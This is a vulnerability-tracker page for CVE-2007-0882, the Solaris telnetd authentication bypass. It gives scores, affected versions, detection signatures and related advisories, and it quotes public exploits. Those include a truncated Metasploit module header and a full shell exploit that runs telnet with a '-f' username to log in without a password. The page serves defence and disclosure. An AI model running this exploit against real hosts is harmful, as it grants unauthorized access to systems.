CVE-2007-0882
published 2007-02-12CVE-2007-0882: Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as…
PriorityP275critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
97.85%
99.9th percentile
Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | krb5 | < krb5 1.4.4-8 (bookworm) | krb5 1.4.4-8 (bookworm) |
| mit | kerberos_5 | < 1.6.1 | 1.6.1 |
| mit | krb5 | >= 0 < 1.4.4-8 | 1.4.4-8 |
| mit | krb5 | >= 0 < 1.4.4-8 | 1.4.4-8 |
| mit | krb5 | >= 0 < 1.4.4-8 | 1.4.4-8 |
| mit | krb5 | >= 0 < 1.4.4-8 | 1.4.4-8 |
| oracle | solaris | — | — |
| oracle | solaris | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
FF FD 26 FF FB 26 FF FD 03 FF FB 18 FF FB 1F FF FB 20 FF FB 21 FF FB 22 FF FB 27 FF FD 05
bytes↗
FF FA 18 00 58 54 45 52 4D FF F0 FF FA 27 00 00 55 53 45 52 01 2D 66 <USER> FF F0
- →Detect telnet login attempts where the username/environment variable begins with '-f' (e.g., '-fbin'), indicating an attempt to pass the -f flag to the login program to skip authentication. ↗
- →Monitor telnet (port 23) traffic for the Telnet NEW-ENVIRON subnegotiation (0xFF 0xFA 0x27) containing a USER variable value starting with the bytes 0x2D 0x66 ('-f'), which is the exploit's injection vector. ↗
- →Alert on telnet sessions to Solaris hosts (SunOS 5.10/5.11) on port 23 where the XTERM environment variable is set (0xFF 0xFA 0x18 0x00 'XTERM') in combination with a USER NEW-ENVIRON value prefixed with '-f', as this is the specific exploit sequence. ↗
- →Flag successful unauthenticated logins to privileged or system accounts (e.g., 'bin') via telnet on Solaris 10/11 systems, as these are the default targets of this exploit. ↗
- ·The exploit targets in.telnetd on Solaris 10 and 11 (SunOS 5.10 and 5.11) only; other platforms running telnetd are not affected by this specific CVE (though CVE-2007-0956 is a similar issue in MIT krb5 telnetd). ↗
- ·The Metasploit module requires the telnet service to be running and reachable on port 23; disabling in.telnetd or blocking port 23 at the network perimeter fully mitigates this vulnerability. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0HIGH
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
Unauthorized access via krb5-telnet daemon
vendor_redhat·2007-04-03·CVSS 10.0
CVE-2007-0956 [CRITICAL] Unauthorized access via krb5-telnet daemon
Unauthorized access via krb5-telnet daemon
The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.
Debian
CVE-2007-0956: krb5 - The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to ...
vendor_debian·2007·CVSS 10.0
CVE-2007-0956 [CRITICAL] CVE-2007-0956: krb5 - The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to ...
The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.
Scope: local
bookworm: resolved (fixed in 1.4.4-8)
bullseye: resolved (fixed in 1.4.4-8)
forky: resolved (fixed in 1.4.4-8)
sid: resolved (fixed in 1.4.4-8)
trixie: resolved (fixed in 1.4.4-8)
GHSA
GHSA-gcgf-6qp7-hmmv: The telnet daemon (telnetd) in MIT krb5 before 1
ghsa_unreviewed·2022-05-03·CVSS 10.0
CVE-2007-0956 [CRITICAL] CWE-306 GHSA-gcgf-6qp7-hmmv: The telnet daemon (telnetd) in MIT krb5 before 1
The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.
GHSA
GHSA-jpgv-x3r5-pm29: Argument injection vulnerability in the telnet daemon (in
ghsa_unreviewed·2022-05-01
CVE-2007-0882 [HIGH] CWE-88 GHSA-jpgv-x3r5-pm29: Argument injection vulnerability in the telnet daemon (in
Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.
OSV
CVE-2007-0956: The telnet daemon (telnetd) in MIT krb5 before 1
osv·2007-04-06·CVSS 10.0
CVE-2007-0956 [CRITICAL] CVE-2007-0956: The telnet daemon (telnetd) in MIT krb5 before 1
The telnet daemon (telnetd) in MIT krb5 before 1.6.1 allows remote attackers to bypass authentication and gain system access via a username beginning with a '-' character, a similar issue to CVE-2007-0882.
No detection rules found.
Exploit-DB
Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)
exploitdb·2010-06-22
CVE-2007-0882 Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)
Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)
---
##
# $Id: fuser.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
'Description' => %q{
This module exploits the argument injection vulnerabilty
in the telnet daemon (in.telnetd) of Solaris 10 and 11.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2007-0882' ],
[ 'OSVDB', '31881'],
[ 'BID', '22512' ],
],
'Privile
Exploit-DB
Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit)
exploitdb·2007-02-12
CVE-2007-0882 Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit)
Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
'Description' => %q{
This module exploits the argument injection vulnerabilty
in the telnet daemon (in.telnetd) of Solaris 10 and 11.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-0882' ],
[ 'OSVDB', '31881'],
[ 'BID', '22512' ],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'
Exploit-DB
SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass
exploitdb·2007-02-11
CVE-2007-0882 SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass
SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass
---
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]"
if [ $# -ne 2 ]; then
echo "./sunos "
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1
# milw0rm.com [2007-02-11]
Metasploit
Sun Solaris Telnet Remote Authentication Bypass Vulnerability
metasploit
Sun Solaris Telnet Remote Authentication Bypass Vulnerability
Sun Solaris Telnet Remote Authentication Bypass Vulnerability
This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.
No writeups or analysis indexed.
http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.htmlhttp://isc.sans.org/diary.html?storyid=2220http://osvdb.org/31881http://seclists.org/fulldisclosure/2007/Feb/0217.htmlhttp://secunia.com/advisories/24120http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1http://www.kb.cert.org/vuls/id/881872http://www.securityfocus.com/archive/1/459831/100/0/threadedhttp://www.securityfocus.com/archive/1/459843/100/0/threadedhttp://www.securityfocus.com/archive/1/459855/100/0/threadedhttp://www.securityfocus.com/archive/1/459980/100/0/threadedhttp://www.securityfocus.com/archive/1/460086/100/100/threadedhttp://www.securityfocus.com/archive/1/460103/100/100/threadedhttp://www.securityfocus.com/bid/22512http://www.securitytracker.com/id?1017625http://www.us-cert.gov/cas/techalerts/TA07-059A.htmlhttp://www.vupen.com/english/advisories/2007/0560https://exchange.xforce.ibmcloud.com/vulnerabilities/32434https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2202http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.htmlhttp://isc.sans.org/diary.html?storyid=2220http://osvdb.org/31881http://seclists.org/fulldisclosure/2007/Feb/0217.htmlhttp://secunia.com/advisories/24120http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1http://www.kb.cert.org/vuls/id/881872http://www.securityfocus.com/archive/1/459831/100/0/threadedhttp://www.securityfocus.com/archive/1/459843/100/0/threadedhttp://www.securityfocus.com/archive/1/459855/100/0/threadedhttp://www.securityfocus.com/archive/1/459980/100/0/threadedhttp://www.securityfocus.com/archive/1/460086/100/100/threadedhttp://www.securityfocus.com/archive/1/460103/100/100/threadedhttp://www.securityfocus.com/bid/22512http://www.securitytracker.com/id?1017625http://www.us-cert.gov/cas/techalerts/TA07-059A.htmlhttp://www.vupen.com/english/advisories/2007/0560https://exchange.xforce.ibmcloud.com/vulnerabilities/32434https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2202
2007-02-12
Published